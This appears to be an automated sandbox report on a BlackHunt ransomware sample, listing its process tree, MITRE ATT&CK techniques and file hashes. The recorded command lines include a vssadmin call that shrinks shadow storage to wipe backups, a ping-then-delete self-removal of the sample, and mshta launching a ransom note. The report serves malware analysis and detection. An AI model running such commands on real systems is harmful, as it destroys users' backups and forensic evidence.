C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8336
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:9468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:11132 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:11756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11756 -s 14444⤵
- Program crash
PID:11952
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe"2⤵PID:8220
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9456
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Modifies registry class
PID:2904
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4564
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8068
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9016
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 11756 -ip 117561⤵PID:1540
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD586ff3e82c47a7de0e92424dd1c2eb9d3
SHA1a635ea6a663c27f574820bd2845dee365a233a5b
SHA2562c7917115a5dd89b5c6d6b4550bc8c93615299c5e1fb9cb448535e96a97ca670
SHA51266fff138eb145b8ea99b559eafe35ab584c5de65a60ec228d5fda2fdb54eee27521cde70f98d4396c40d2db2aa924269928050af1f1abc90cd9ef44529f117a9
-
Filesize
12KB
MD506d4c2d13f854e779efc00304e8809d1
SHA1b2263b0a1d92de8c15d70f51a4043b04e84c8dfc
SHA256924b4d1594be2bcdf54ea6e93e7f489978c3451b39ae2f11ffba1646420c5a34
SHA512768c9264ca26988f2826bc98723e4af0860d3fbc402574ca5649a10def9f291aed58b03737e7acef495d1ccf9a3bf462da9940495b2cd0ae88fcfb2a452addb5
-
Filesize
684B
MD5a579e24ba2150cc7b2b1b9cf1c828a67
SHA1bf1400c5f544094187b3a150e583e9f66b30509b
SHA256cb0c92e9a6531f965ccaf0c9ad3ecb9f751e0a78326430073be6fe709491f64b
SHA51278c197db2d3b4a6d0c61075fe0640359696d9cf43833f06f69f0e74fd756becaa5daf1a9d298172643028eb596de8f9f6000a662fad7dc41f593f0945fd35618